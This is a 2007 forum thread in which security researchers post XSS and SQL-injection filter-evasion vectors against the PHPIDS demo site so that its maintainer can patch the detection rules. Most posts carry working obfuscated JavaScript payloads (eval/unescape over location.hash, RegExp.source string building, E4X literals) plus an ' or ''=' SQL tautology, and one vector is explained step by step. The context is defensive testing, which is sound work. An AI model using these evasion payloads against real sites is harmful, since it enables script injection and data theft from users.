@Kishor: We definitely should think about a way to persist the gathered knowledge in a more usable and comprehensive way. Let's chat about this topic the next days please!

@all: Awesome vectors again - I'm starting to repeat myself ;) I am just fixing the issues...

Please consider reading the last group post about the future of the PHPIDS - I am very interested in what you guys think about this current arms race.

http://groups.google.de/group/php-ids/msg/b4008196f38bcb15

Greetings,
.mario

.mario: your response time is amazing! :D, you fix the issues really fast :P

The link you give is just for your reply, the hole thread is:
http://groups.google.de/group/php-ids/browse_thread/thread/f689a9c8cc934867/9a59ea6557f36bd0#9a59ea6557f36bd0
I'll post there my opinion :)

New javascript vector:
http://demo.php-ids.org/?test=a%3D0%7C%7Ceval%7C%7C0%3Bb%3D0%7C%7Cunescape%7C%7C0%3Ba%28b%28location%29%29#%0d%0aalert%28%22xss%22%29%3B

Flaw in SQL detection (why just uppercase?):
http://demo.php-ids.org/?test=%27%20or%20%27%27%3D%27

Greetz!!



Edited 1 time(s). Last edit at 07/05/2007 04:16AM by sirdarckcat.

@sirdarckcat:
very nice idea on the full URL broken with newline (just %0A suffices, no need for %0D) :)

If somebody still wonders why it works, it has something to do with my klingon: joke at the beginning of this thread...

http: - parsed as a valid ECMA262 label
//host:port/path/...#...[newline] - C++ style comment opener
yourPayloadHere() - :D

So we can do also

eval(unescape(document.URL))
eval(unescape(document.documentURI))

and if injected in a HTML event handler,

eval(unescape(this.ownerDocument.URL))

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 07/05/2007 06:40AM by ma1.

@sirdarckcat: Thx - both issues are fixed. I will enhance the internal converters to deal with the concatenation and linebreak issues this evening.

@mario: let us know when it's ready for another round, then ;)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@ma1: will do for sure ;)

@all: Let's dance again - new rules, new converter!

Was somewhat pleased with:

http://demo.php-ids.org/?test=l=%200%20||%20'str',m=%200%20||%20'sub',x=%200%20||%20'al',y=%200%20||%20'ev',g=%200%20||%20'tion.h',f=%200%20||%20'ash',k=%200%20||%20'loca',d=%20(k)%20%2B%20(g)%20%2B%20(f),a=0%20||%20(y)%20%2B%20(x),b=1[a](d),c=0%20||%20(m)%20%2B%20(l),1[a](b[c](1));#alert(1)

:)

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Hi

very good, this was a little harder :P
http://demo.php-ids.org/?test=_%3Deval%2C__%3Dunescape%2C___%3Dlocation%2C_%28__%28___%29%29#%0aalert(%22xss%22%29

Greetz!!



Edited 1 time(s). Last edit at 07/06/2007 12:19AM by sirdarckcat.

Awesome use of _ as variable names - v. cool indeed!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Martin Wrote:
-------------------------------------------------------
> Awesome use of _ as variable names

On the contrary, I'm quite surprised that underscore was not already recognized as a valid identifier character: /\w/ matches it (as a word letter), and it's valid in many programming languages.

JS can actually use slightly more exotic identifiers, but I'll keep them for later ;)

In the meanwhile, now you catch "location" (in latest sirdarckcat vector), but looks like someone didn't read carefully my previous post ;)

http://demo.php-ids.org/?test=_=eval,__=unescape,___=document.URL,_(__(___))#%0Aalert(1%29

Oh, the madness of enumerating badness ;)

BTW, you know that all through this carousel, I never had to adjust NoScript's Anti-XSS filter for catching anything new?
ATM I'm just optimizing for speed and using the extra wisdom acquired in this thread to release constraints :)
I'm between 0 and 30 millisecs for complex URLs. Have you got any benchmark for (PHP|NET)IDS?

Cheers

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Fixed - and looking forward for the 'later' ;)

sirdarckcat Wrote:
-------------------------------------------------------
> Ronald:
>
> The following chars are in deed, used commonly in
> legal requests:
>
> [
> ]
> +
> =
>
> (+ means space, = is used for GET fields, [] is
> used for multiple choices in a )
>
> :)

> Greetz!!

I said in the query part, like I said no good request query has these in them. That is why I block all these kind of reuqest uri fiddling.

.mario Wrote:
-------------------------------------------------------
> @Ronald: Jep - but what about POST?


Most IDS systems detect upon the GET request, because if you can post something it is already too late. Everything posted should be encoded in any case, without exception.

I wish you wouldn't fix them so fast .mario! I had to create my own vulnerable php page so I could dissect (fully appreciate) some of these new vectors :)

Dont worry thornmaker, here is a newone:

http://demo.php-ids.org/?test=%281%3Feval%3A0%29%281%3F%281%3Feval%3A0%29%280%3F1%3A%27unesca%27%2B%281%3F%27pe%27%3A0%29%2B%280%3F1%3A%27%28loca%27%2B%281%3F%27tion%29%27%3A0%29%29%29%3A0%29#%0aalert%28%22xss%22%29;

:P greetz!!

thanks sirdarckcat :) I got that one before .mario did! and quite a clever one too

@ma1: Fixed

Kishor Was Here!

Hmmm, looks like once you are inside script tag, you rule the world!

Web Application Security Journ(ey)al

Interesting, RegExp.source :P

here is an incomplete vector, I didn't had time to implement into the "location" way..

http://demo.php-ids.org/?test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

anyway it shows an alert :P

Greetz!!

kishord Wrote:
-------------------------------------------------------
> > Kishor Was Here!
>
> Hmmm, looks like once you are inside script tag,
> you rule the world!

Oh yeah!

Disclaimer & credits: original disclosure and flattering proof of concept courtesy of elio
Warning: if you use NoScript, you'll need to allow a ton of assorted junk, included google analytics: the first ad-sponsored XSS? :D


--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

This is exactly what I meant:
http://demo.php-ids.org/?test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

This will never happen in a legitimate query and thereby this can be detected very quickly with all combinations of: ( = , ' " : ( ) [ ])

I personally never saw a queries like this, did you?

index.php?id=' // illegal
index.php?id=f=b // illegal
index.php?id=( // illegal
index.php?id=< // illegal
index.php?id=> // illegal
index.php?id=^ // illegal
index.php?id=& // illegal
index.php?id=$ // illegal
index.php?id=~ // illegal
index.php?id=` // illegal

Know why? because they are unsafe chars and should be detected in the first IDS round, because they are used to pentest a system first in order to refine the injection later.

Ronald Wrote:
-------------------------------------------------------
> This is exactly what I meant:
> http://demo.php-ids.org/?test=___%3D1%3F%27ert%281
> 23%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27
> ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29
>
> This will never happen in a legitimate query and
> thereby this can be detected very quickly with all
> combinations of: ( = , ' " : ( ) [ ])
>
> I personally never saw a queries like this, did
> you?

I can't see anything illegal in that query, it's all urlencoded:
test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

BTW, if I was an admin of this board, I would obviously see a lot of legitimate HTTP requests like that, especially in the traffic related to the "So it begins" thread.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@all: nice ones again... and fixed :)

@Kishord: Wow. I'm speechless. What is that?

@Ronald: I agree when talking about GET Requests. Maybe we should consider doing a before-filter validation when the request type is GET to add initial impact when spiced with illegal characters.

Grx
.mario

.mario Wrote:
-------------------------------------------------------
> @Ronald: I agree when talking about GET Requests.

So these are all illegal, right?

http://en.wikipedia.org/wiki/Heroes_(TV_series%29

http://kb.mozillazine.org/Label%3D%22%26blockImageCmd._label%3B%22

http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Reference:Global_Functions:eval

And I didn't even add any query string :)

As for the tilde character, ~, maybe you're too young to remember the time when most of the web URLs contained one (especially in .edu sites), because it's an Unix shortcut for user's home.

Finally, ?param=& is quite common and legal, since it's sent every time an optional field is left empty in a form.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 07/06/2007 05:17PM by ma1.

http://www.ietf.org/rfc/rfc1738.txt
http://www.ietf.org/rfc/rfc1808.txt
http://gbiv.com/protocols/uri/rfc/rfc3986.html#collected-abnf

K - I agree.

@Mario

Hi, Here is an explanation of the vector:

evil=/ev/.source+/al/.source
//---variable evil now contains string 'eval'

changeProto=/Strin/.source+
/g.prototyp/.source+
/e.ss=/.source+
/Strin/.source+
/g.prototyp/.source+
/e.substrin/.source+
/g/.source;

//--- changeProto now contains string 'String.prototype.ss=String.prototype.substring'
// Thus now ss is same as substring for any string


hashCod=/documen/.source+
/t.locatio/.source+
/n.has/.source+
/h/.source;

// hashCod now contains string 'document.location.hash'

7[evil](changeProto);
// In turn, the statement above executes eval(changeProto)

hash=7[evil](hashCod);

// In turn, the statement above executes hash=eval(hashCod)
// Thus hashCod now holds a string "#alert('Kishor Was Here!')"

cod=hash.ss(1);

// Since we added ss to String class, cod becomes = "alert('Kishor Was Here!')"

7[evil](cod);
// We use the eval to evaluate cod


In the link of the POC I needed to rename several things e.g. hash to hsh


Hope it was simple ;)

@Mario
When you write all this up, consider using word 'JavasCrypt' in the title
if it doesn't sound like a bad idea.

Web Application Security Journ(ey)al

@Kishord: Thanks for the explanation - JavaSCrypt matches the properties of that vector ;) I was also thinking about 'The new dawn of filter evasion' :D

Greetings,
.mario

http://demo.php-ids.org/?test=%24%3Ddocument%2C%24%3D%24.URL%2C%24%24%3Dunescape%2C%24%24%24%3Deval%2C%24%24%24%28%24%24%28%24%29%29#%0Aalert%28%27$$$%20PECUNIA%20NON%20OLET%20$$$%27%29

... && JavasCrypt.votes++ //:)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Hi!

Today I'll introduce the use of XML Predicates in JavaScript to the
vectors.

I was trying to leave this to the end, but..

http://demo.php-ids.org/?test=y%3D%3Ca%3Ealert%3C/a%20%3E%3Bcontent%5By%5D%28123%29

The code:
y=<a>alert</a >;content[y](123)

The XML Predicate:
y=<a>alert</a >;

I'm running out of ideas :P, this filter is a pretty hard obstacle to
any attacker, congratulations mario :D

Greetz!!

PS. content=window
JavasCrypt rulz :P



Edited 1 time(s). Last edit at 07/07/2007 08:32AM by sirdarckcat.